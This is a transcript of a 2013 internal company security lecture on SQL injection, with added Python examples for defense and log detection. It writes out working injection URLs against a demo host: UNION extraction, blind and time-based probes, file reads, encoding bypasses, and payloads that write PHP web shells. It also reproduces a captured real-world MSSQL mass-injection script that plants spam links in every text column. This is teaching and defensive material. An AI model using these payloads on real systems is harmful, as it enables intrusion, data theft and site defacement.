Server-Side Attacks and Defenses I
Client-Side Attacks and Defenses
Hiiir - Taien internal security lecture
1020307
Taien Wang
Transcript

  • 1. Taien Internal Security Lecture IV: Server-Side Attacks and Defenses I, 2013.03.07 @ Hiiir Inc. Taien Wang <taien_wang@hiiir.com>, New Ventures Division, 英屬維京群島商時間軸科技股份有限公司 (Hiiir Inc.)
  • 2. 1020307 Server-Side Attacks and Defenses I - Outline
      • SQL Injection
          – Attack techniques
              • Testing whether a vulnerability exists
              • Commonly used functions
              • UNION
              • Bypassing escaped characters
                  – ASCII encoding
                  – Hexadecimal
                  – Double-byte escape technique
          – SQL Blind Injection
              • Time-Based Blind SQL Injection
          – SQL Column Truncation
  • 3. SQL Injection - Introduction
      • Rfp, "NT Web Technology Vulnerabilities", Phrack, 1998
      • Wikipedia: SQL injection (SQL攻擊, called SQL注入攻擊 in mainland China, also abbreviated 隱碼攻擊) is a security flaw that occurs at the database layer of an application. In short, SQL commands are smuggled inside an input string; a poorly designed program fails to check the input, so the database server mistakes the embedded commands for legitimate SQL and executes them, and the system is compromised.
  • 4. SQL Injection - Data in the sample database (slide body is an image, not in the transcript)
  • 5. SQL Injection - Think about what is wrong with this code (slide body is an image, not in the transcript)
  • 6. SQL Injection attack techniques - Simple tests for whether a vulnerability exists
      • http://www.hackdemo.com/getUser.php?id=1
      • http://www.hackdemo.com/getUser.php?id=
      • http://www.hackdemo.com/getUser.php?id=999999.9
      • http://www.hackdemo.com/getUser.php?id=1'
      • http://www.hackdemo.com/getUser.php?id=1+and+1=1
      • http://www.hackdemo.com/getUser.php?id=1+and+1=2
  • 7. SQL Injection attack techniques - Whitespace and comments
      • Keywords in mixed upper and lower case
      • Comments: #(%23), /*, --
      • Whitespace: +, /**/
      • URL encodings that the parser accepts as whitespace:
          %09  horizontal tab
          %0a  line feed
          %0b  vertical tab
          %0c  form feed
          %0d  carriage return
          %20  space
  • 8. SQL Injection attack techniques - Functions commonly used to extract data
      LENGTH(str): returns the length of the string
      LEFT(str,len): returns the leftmost len characters of str
      RIGHT(str,len): returns the rightmost len characters of str
      SUBSTRING(str,pos,len): returns a substring of str
      SUBSTR(str,pos,len): synonym for SUBSTRING
      MID(str,pos,len): synonym for SUBSTRING
      CHAR(N,... [USING charset]): returns a string made up of the characters with the given integer code values
      HEX(N_or_S): if N or S is a number, returns its hexadecimal representation as a string
      ASCII(str): returns the numeric value of the leftmost character of str
      CONCAT(str1,str2,...): returns the string formed by concatenating all the arguments
      NAME_CONST(name,value): returns the given value; when used to produce a result-set column, NAME_CONST() makes that column use the given name (since 5.1 the value must be a constant)
      …
  • 9. SQL Injection attack techniques - Related system functions
      LOAD_FILE(file_name): reads a file
      INTO OUTFILE '/var/www/html/back.php': writes query output to a file
      VERSION(): returns the MySQL server version
      DATABASE(): name of the database currently in use
      USER(): returns the current MySQL user name and host name
      SYSTEM_USER(): synonym for USER()
      SESSION_USER(): synonym for USER()
      SCHEMA(): synonym for DATABASE()
      CURRENT_USER(): returns the user name and host name of the authenticated account, which may differ from the value of USER()
      @@DATADIR: path of the data directory
      @@BASEDIR: installation path of the database server
      …
  • 10. SQL Injection attack techniques - Notes on reading files
      • The file to be read must be on the database server
      • The full path of the file must be specified
      • The MySQL account must have permission to read it, and the file must be readable by everyone
      • The file must be smaller than max_allowed_packet
  • 11. SQL Injection attack techniques - UNION
      • PHP+MySQL does not support multi-statement (stacked) queries, so the UNION set operator is used instead
          – Vulnerable SQL with an unquoted parameter (PHP example)
              • SELECT * FROM `member` WHERE `id` =$id
          – Attack example for the unquoted parameter
              • http://www.hackdemo.com/getUser.php?id=1+and+1=2+UNION+SELECT+1,2,3,4#
          – Statement actually executed
              • SELECT * FROM `member` WHERE `id` =1 AND 1=2 UNION SELECT 1,2,3,4#
  • 12. SQL Injection attack techniques - UNION
      • PHP+MySQL does not support multi-statement queries, so the UNION set operator is used instead
      • Vulnerable SQL with a quoted parameter (PHP example)
          • SELECT * FROM `member` WHERE `name` like '" . $name . "%'
      • Attack example for the quoted parameter
          • http://www.hackdemo.com/searchUser.php?name=h%'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()%23
      • Statement actually executed
          • SELECT * FROM `member` WHERE `name` like 'h%'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()#%'
  • 13. SQL Injection attack techniques - Successfully controlling the statement (slide body is an image, not in the transcript)
  • 14. SQL Injection attack techniques - Extracting data
      • Obtaining the length
          – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=1#
          – …
          – http://www.hackdemo.com/getUser.php?id=1+AND+LENGTH(PASSWORD)=7#
      • Guessing the data
          – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='a'#
          – …
          – http://www.hackdemo.com/getUser.php?id=1+AND+RIGHT(PASSWORD,1)='w'#
  • 15. SQL Injection attack techniques - Reading and writing files
      • Reading data and writing it to a file
          – http://www.hackdemo.com/getUser.php?id=1+into+outfile+'D:/Website/www.hackdemo.com/member.txt'
      • Writing a backdoor
          – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+%22%3C?php+system($_GET['cmd']);?%3E%22,2,3,4+into+outfile+'D:/Website/www.hackdemo.com/cmd.php'
  • 16. After adding escaping and turning off error messages, is it safe now?
  • 17. SQL Blind Injection
      • SQL blind injection is another type of SQL injection. Ordinary SQL injection relies on the error messages produced to construct the attack statement, whereas blind injection relies entirely on whether the injected statement evaluates to true or false
      • SQL Blind Injection
          – Ordinary blind injection
          – Time-Based Blind SQL Injection
  • 18. Time-Based Blind SQL Injection (1/2)
      • Uses a time delay to determine whether the SQL statement executed successfully
      • Techniques
          – Built-in functions
              • BENCHMARK(COUNT, EXPR)
              • SLEEP(seconds) - MySQL >= 5
          – Constructing statements that take a long time to run (heavy queries)
  • 19. Time-Based Blind SQL Injection - Using heavy queries (2/2) (slide body is an image, not in the transcript)
  • 20. Time-Based Blind SQL Injection - Guessing the database name through time delays
      • http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(1),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
      • …
      • http://www.hackdemo.com/getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE('ENCODE','5s')),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb
  • 21. SQL Injection attack techniques - Bypassing escaped characters
      • ASCII encoding
          – ASCII(), CHAR()
          – Single character
              • CHAR(68)
          – Multiple characters
              • CHAR(68, 58, 92)
      • Hexadecimal encoding
          – HEX()
          – 0x443A5C
      • Double-byte escape technique
  • 22. SQL Injection attack techniques - Extracting data (bypassing escaping)
      • Guessing fields
          – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+user--
          – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+member--
      • Guessing field data
          – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(0)
          – …
          – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(119)
  • 23. SQL Injection attack techniques - Reading data (bypassing escaping)
      • Reading data and writing files
          – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,112,104,112))--
          – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870)--
  • 24. SQL Injection attack techniques - Writing files (when the quote restriction cannot be bypassed)
      1. Find phpMyAdmin
      2. Connect to MySQL remotely:
         mysql> use xssdb;
         mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
         mysql> prepare cmd from @a;
         mysql> execute cmd;
      @a decodes to: select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php';
      The file written is: <?php @eval($_POST['cmd']);?>
  • 25. SQL Injection attack techniques - Double-byte escape technique (1/3)
      • An injected lead byte recombines with the backslash \ (%5c) that escaping inserts into a single two-byte character, so the following ' is no longer escaped and the escaping restriction is bypassed
      • Scenario
          – Escaping is performed by
              • addslashes
              • mysql_escape_string
              • php.ini with magic_quotes_gpc enabled
          – The connection uses BIG5 or GBK encoding
              • set names gbk, set names big5
  • 26. SQL Injection attack techniques - Double-byte escape technique (2/3)
      • Chinese-language text is represented with two bytes
          – Big5:
              • High byte: 0x81-0xFE; low byte: 0x40-0x7E, 0xA1-0xFE
          – GBK:
              • Lead byte: 0x81-0xFE; trail byte: 0x40-0x7E
          – GB2312:
              • Lead byte: 0xB0-0xF7; trail byte: 0xA0-0xFE
          – Attack characters: %BF, %CC, %D5…
  • 27. SQL Injection attack techniques - Double-byte escape technique (3/3)
      • Bypassing escaping on a quoted parameter
          – http://www.hackdemo.com/searchUserLash.php?name=h%%B5'+AND+1=2+UNION+SELECT+1,2,3,4%23
          – http://www.hackdemo.com/searchUserLash.php?name=h%%CC'+AND+1=2+UNION+SELECT+1,2,3,4%23
          – http://www.hackdemo.com/searchUserLash.php?name=h%%d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
  • 28. SQL Column Truncation - Introduction (1/3)
      • SQL mode in MySQL
          – STRICT_ALL_TABLES not enabled
              • Inserting data longer than the column produces a warning
              • But the (truncated) data is still inserted
          – STRICT_ALL_TABLES enabled
              • Inserting data longer than the column produces a message
              • ERROR 1406 is raised and the row is not inserted
      • Incident - 2008-09-07
          • WordPress 2.6.1 SQL Column Truncation Vulnerability
  • 29. SQL Column Truncation - Effect (2/3) (slide body is an image, not in the transcript)
  • 30. SQL Column Truncation - Defenses (3/3)
      • Actively strip whitespace from strings that should never contain it
          – e.g. account-name fields
      • Add the BINARY operator when SELECTing
      • Configure MySQL to compare with BINARY by default
      • Enable STRICT_ALL_TABLES in MySQL
          – Exceeding the column length then raises an ERROR instead of a WARNING
          – To avoid failures on insert, additional length checks may be needed in the insert and update code
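To make the mechanism on slides 28 to 30 concrete, the following Python simulation is added for this page; it is not code from the talk and it is not MySQL itself. It models non-strict truncation, the PAD SPACE comparison that ignores trailing spaces (the behaviour of MySQL's default collations before 8.0 introduced NO PAD collations), and a BINARY comparison, and it shows the application-side check that slide 30 recommends. The 16-character column width, the user list and the replayed registration sequence (a name that the database truncates to an existing account name, the WordPress 2.6.1 pattern from slide 28) are assumptions written into the code.

```python
# Simulation of the MySQL behaviours described on slides 28-30: plain Python,
# not a database. Column width and user data are constructed for the demo.

COLUMN_LEN = 16  # assumed width of an account-name column, e.g. user_login VARCHAR(16)


class TruncationError(ValueError):
    """Stands in for MySQL ERROR 1406 (data too long) under STRICT_ALL_TABLES."""


def store_nonstrict(column_len, value):
    # Without STRICT_ALL_TABLES: the value is cut to column_len characters and
    # the server only emits a warning; the row is still written.
    return value[:column_len]


def store_strict(column_len, value):
    # With STRICT_ALL_TABLES: an over-long value is rejected and nothing is written.
    if len(value) > column_len:
        raise TruncationError("data too long for column")
    return value


def strict_rejects(column_len, value):
    """True if strict mode would refuse this value."""
    try:
        store_strict(column_len, value)
    except TruncationError:
        return True
    return False


def padspace_equal(a, b):
    # PAD SPACE collations ignore trailing spaces when comparing CHAR/VARCHAR values.
    return a.rstrip(" ") == b.rstrip(" ")


def binary_equal(a, b):
    # WHERE BINARY col = ? compares byte for byte; trailing spaces are significant.
    return a == b


def lookup(users, name, compare=padspace_equal):
    """SELECT ... WHERE name = ? over the simulated table."""
    return [u for u in users if compare(u, name)]


def validate_account_name(value, column_len):
    """Application-side check from slide 30: no whitespace anywhere in an account
    name, and the column length enforced before the row reaches the database."""
    if any(ch.isspace() for ch in value):
        return False
    return 0 < len(value) <= column_len


def demo_collision(column_len=COLUMN_LEN):
    """Replay of the slide 28 incident pattern: register a name that the
    database silently truncates to an existing account name."""
    users = ["admin"]
    attempt = "admin" + " " * 20 + "x"  # longer than the column, and not equal to 'admin'
    already_taken = bool(lookup(users, attempt))  # the app's "does this name exist?" check
    users.append(store_nonstrict(column_len, attempt))  # stored as 'admin' + 11 spaces
    # Under PAD SPACE both rows now answer to 'admin'.
    return already_taken, lookup(users, "admin")


if __name__ == "__main__":
    taken, matches = demo_collision()
    print("registration check found a clash:", taken)
    print("rows matching 'admin' (PAD SPACE):", matches)
    print("rows matching 'admin' (BINARY):   ", lookup(matches, "admin", compare=binary_equal))
    print("validate_account_name rejects it: ", not validate_account_name("admin" + " " * 20 + "x", COLUMN_LEN))
```

The point of the replay is that every individual step behaves as documented: the existence check is honest, the insert "succeeds", and the later lookup is correct under the collation rules. Only the combination is wrong, which is why the defence has to be applied at the edge (whitespace and length validation) or in the server's mode (STRICT_ALL_TABLES), not by trusting any one query.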
  • 31. SQL Injection - Further thoughts
      • Can INSERT and UPDATE statements be attacked as well?
      • Does NoSQL really have no SQL injection?
      • Other exploitation paths
          – Deep Blind Injection
          – Error-Based Injection
              • Duplicate Error
              • Function
          – information_schema
          – User-Defined Functions
          – Triggers
  • 32. SQL Injection - Automated tools
      • Havij
      • Pangolin
      • w3af
      • Jsky
      • SQLmap
      • …
  • 33. Defending against SQL Injection correctly
      • Principle of least privilege
      • Use prepared statements
      • Use stored procedures
      • Use UTF-8; avoid BIG5 and GBK
      • Check data types and cast explicitly
          – bool settype(mixed &$var, string $type)
          – intval, doubleval...
      • Use safe encoding functions
          – OWASP ESAPI
              • MySQLCodec
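Slides 11, 12 and 33 together describe the defect and its fix: the `id` and `name` parameters are concatenated into the statement, and the cure is type enforcement plus prepared (parameterized) statements. The following Python example is added here and is not code from the talk. It uses an in-memory SQLite table with a constructed `member` schema standing in for the MySQL one, and SQLite's `--` comment in place of MySQL's `#`, so the behaviour can be checked offline. The vulnerable functions reproduce the `1 and 1=1` / `1 and 1=2` probes from slide 6 and the UNION cases from slides 11 and 12; the safe versions cast to int before binding (the intval step from slide 33) and escape LIKE wildcards.

```python
import sqlite3


# Constructed in-memory stand-in for the talk's `member` table; column names are assumed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE member (id INTEGER PRIMARY KEY, name TEXT, password TEXT, email TEXT);
        INSERT INTO member VALUES (1, 'hiiir', 's3cretpw', 'a@example.invalid');
        INSERT INTO member VALUES (2, 'helen', 'pass2',    'b@example.invalid');
        INSERT INTO member VALUES (3, 'tom',   'pass3',    'c@example.invalid');
    """)
    return conn


def get_user_vulnerable(conn, raw_id):
    # Slide 11: the unquoted parameter is spliced straight into the statement.
    sql = "SELECT id, name FROM member WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def get_user_safe(conn, raw_id):
    # Slide 33: enforce the type first (the PHP intval step), then bind a parameter.
    try:
        uid = int(raw_id)
    except ValueError:
        return None  # not a well-formed id: reject instead of querying
    return conn.execute("SELECT id, name FROM member WHERE id = ?", (uid,)).fetchall()


def search_user_vulnerable(conn, raw_name):
    # Slide 12: the quoted parameter is concatenated into a LIKE pattern.
    sql = "SELECT id, name FROM member WHERE name LIKE '" + raw_name + "%'"
    return conn.execute(sql).fetchall()


def search_user_safe(conn, raw_name):
    # Bind the pattern as a parameter, and escape the LIKE wildcards so user input
    # cannot widen the match; the ESCAPE clause tells SQLite which character we used.
    escaped = raw_name.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return conn.execute(
        "SELECT id, name FROM member WHERE name LIKE ? ESCAPE '\\' ORDER BY id",
        (escaped + "%",),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The slide 6 probes: a true condition keeps the row, a false one drops it,
    # which is the tell that the input reached the SQL engine.
    print(get_user_vulnerable(db, "1 and 1=1"))
    print(get_user_vulnerable(db, "1 and 1=2"))
    # UNION case from slide 11, with SQLite's -- comment in place of MySQL's #.
    print(get_user_vulnerable(db, "1 and 1=2 union select 1,2 --"))
    print(get_user_safe(db, "1 and 1=2"))  # None: rejected by the int cast
    print(search_user_vulnerable(db, "h%' and 1=2 union select 1,2 -- "))
    print(search_user_safe(db, "h%' and 1=2 union select 1,2 -- "))  # []: treated as a literal name
    print(search_user_safe(db, "h"))
```

Parameter binding alone does not protect a LIKE pattern from `%` and `_` supplied by the user, which is why the safe search escapes them and declares the ESCAPE character; the same holds for MySQL with mysqli or PDO prepared statements. Binding also makes the encoding tricks on slides 21 to 27 irrelevant to the statement's structure, because the value never passes through the SQL parser as text.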
  • 34. MSSQL real-world case - Automated injection from 116jurist.ru (1/4)
      • 2012.12.xx 10:03:31
      • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c657320742077686572652063 2e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c452840404645544348 5f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c2043484152494e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
  • 35. MSSQL real-world case - Automated injection from 116jurist.ru (2/4)
      • 2012.12.xx 10:03:33
      • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c65732074207768657265 20632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040464554434 85f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272b40542b275d20414c54455220434f4c554d4e205b272b40432b275d2076617263686172283830303029204e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
  • 36. MSSQL real-world case - Automated injection from 116jurist.ru (3/4)
      • 2012.12.xx 10:03:44
      • Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c65732074207768657265 20632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040464554434 85f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
  • 37. MSSQL real-world case - Automated injection from 116jurist.ru, decoded (4/4)
      • set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
      • set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
      • set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru>þðèäè÷åñêèå-óñëóãè-ìîñêâà</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
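The 116jurist.ru requests above, and the evasions on slides 7, 18 to 20 and 25 to 27, are what a log-side check has to see through: `+` and `%xx` encoding, `/**/` in place of spaces, mixed case, and a whole T-SQL script carried as a hex literal inside `cast()`. The following Python is an added example, not part of the slides, showing how to normalize a logged query string, apply the indicators the talk lists, and recover the script from the `cast(0x...)` form the way slide 37 does by hand. The sample requests, the 3-second delay threshold and the timings are constructed; the hex prefix is copied from the first payload on slide 34 and decodes to the opening of the statement shown on slide 37.

```python
import re
from urllib.parse import unquote_to_bytes

# Hex prefix copied from the first 116jurist.ru payload (slide 34). It decodes to
# "set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255)".
PAGE_HEX_PREFIX = (
    "73657420616e73695f7761726e696e6773206f6666"  # "set ansi_warnings off"
    "204445434c415245"                            # " DECLARE"
    "204054"                                      # " @T"
    "20564152434841522832353529"                  # " VARCHAR(255)"
    "2c4043"                                      # ",@C"
    "20564152434841522832353529"                  # " VARCHAR(255)"
)

# Constructed sample traffic: (query string as logged, response time in seconds).
# Payload shapes follow the slides; the timings are made up for the demo.
SAMPLE_REQUESTS = [
    ("id=1", 0.02),
    ("id=1+and+1=2+UNION+SELECT+1,2,3,4%23", 0.03),
    ("name=h%25'/**/and/**/1=2/**/union/**/select/**/1,2,3,user()%23", 0.03),
    ("id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,"
     "ENCODE('ENCODE','5s')),NULL),2,3,4", 5.2),
    ("name=h%25%BF'+AND+1=2+UNION+SELECT+1,2,3,4%23", 0.04),
    ("Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x" + PAGE_HEX_PREFIX
     + "+as+varchar(8000))+exec(@s)--", 0.3),
]

SLOW_SECONDS = 3.0  # constructed threshold; tune to the endpoint's normal latency

# Indicators drawn from the techniques on the slides, matched on normalized lower-case text.
INDICATORS = {
    "union_select": r"\bunion\b.*\bselect\b",
    "comment_terminator": r"(#|--)$",
    "time_based_function": r"\b(benchmark|sleep)\s*\(",
    "file_access": r"\binto\s+outfile\b|\bload_file\s*\(",
    "hex_cast_exec": r"\bcast\s*\(\s*0x[0-9a-f]+.*\bexec\s*\(",
}


def normalize(query_string):
    """Undo the slide 7 evasions before matching: '+' and %xx encoding, and /**/
    used as a space. Case is handled by the caller with .lower()."""
    raw = unquote_to_bytes(query_string.replace("+", " "))
    text = raw.decode("latin-1")  # one char per byte, so 0x81-0xFE lead bytes survive
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).strip()


def analyze(query_string, seconds):
    """Return the sorted list of indicator names that fire for one request."""
    text = normalize(query_string)
    low = text.lower()
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, low)]
    # Slides 25-27: a high byte immediately before a quote is the double-byte trick.
    if re.search(r"[\x81-\xfe]'", text):
        hits.append("multibyte_before_quote")
    # Slides 18-20: a timing function plus an unusually slow response.
    if "time_based_function" in hits and seconds >= SLOW_SECONDS:
        hits.append("delay_observed")
    return sorted(hits)


def decode_hex_cast(query_string):
    """Recover the script hidden in cast(0x... as varchar(8000)), as slide 37 does by hand."""
    m = re.search(r"cast\s*\(\s*0x([0-9a-f]+)", normalize(query_string).lower())
    if not m:
        return None
    try:
        return bytes.fromhex(m.group(1)).decode("latin-1")
    except ValueError:  # odd length or non-hex digits, e.g. a truncated log line
        return None


if __name__ == "__main__":
    for qs, secs in SAMPLE_REQUESTS:
        print(f"{secs:5.2f}s  {analyze(qs, secs)}")
        decoded = decode_hex_cast(qs)
        if decoded:
            print("        decoded:", decoded)
```

The payload is decoded as Latin-1 so that every byte maps to one character; the link text in the third payload is actually Windows-1251 Cyrillic, which is why the slide renders it as accented Latin letters. Pattern matching of this kind is a triage aid rather than a fix: parameterized queries remain the control, and a rule tuned on these samples should be checked against the application's own legitimate traffic before it is allowed to block.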
  • 38. References
      • 吳翰清, 網路竟然這麼危險 (白帽子讲Web安全), 2012
      • MySQL, String Functions, 5.1
      • MySQL, Miscellaneous Functions, 5.1
      • MySQL/PHP 对单引号转义时 load_file/outfile 生成一句话 (using load_file/outfile to produce a one-line web shell when MySQL/PHP escapes single quotes)
      • Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
      • Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
